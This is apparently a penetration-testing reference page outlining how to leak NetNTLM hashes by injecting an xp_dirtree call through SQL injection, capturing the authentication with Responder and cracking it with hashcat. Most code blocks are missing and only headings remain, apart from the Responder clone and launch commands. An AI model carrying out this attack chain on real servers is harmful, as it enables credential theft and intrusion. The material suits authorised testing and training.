Leaking NetNTLM Hashes
Overview
Attack Flow
1. Start Responder (SMB listener)
2. Inject xp_dirtree to access our "share"
3. Capture NetNTLM hash
4. Crack hash with hashcatStep 1: Start Responder
Clone Repository
git clone https://github.com/lgandx/Responder
cd ResponderStart Listening
sudo python3 Responder.py -I tun0Step 2: Trigger SMB Authentication
SQL Query
SQLi Payload
URL Encode
Send Request
Step 3: Capture Hash
Responder Output
Step 4: Crack the Hash
Hashcat Command
Full Example
Output
Alternative SMB Coercion Methods
Function
Query
Complete Attack Chain
Hash Format Reference
NetNTLMv2 Format
Hashcat Mode
Hash Type
Mode
Troubleshooting
No Hash Captured
Hash Won't Crack
Use Cases
Quick Reference
Responder
Payload
Crack
Last updated